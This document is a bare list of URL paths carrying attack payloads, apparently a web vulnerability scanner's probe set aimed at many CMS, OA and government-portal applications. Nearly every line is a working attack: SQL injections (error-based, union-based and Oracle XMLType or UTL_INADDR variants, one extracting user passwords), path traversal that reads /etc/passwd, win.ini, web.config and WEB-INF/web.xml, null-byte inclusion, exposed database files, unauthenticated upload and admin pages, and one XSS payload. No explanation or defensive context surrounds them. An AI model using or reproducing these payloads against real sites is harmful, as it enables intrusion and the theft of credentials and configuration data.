/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
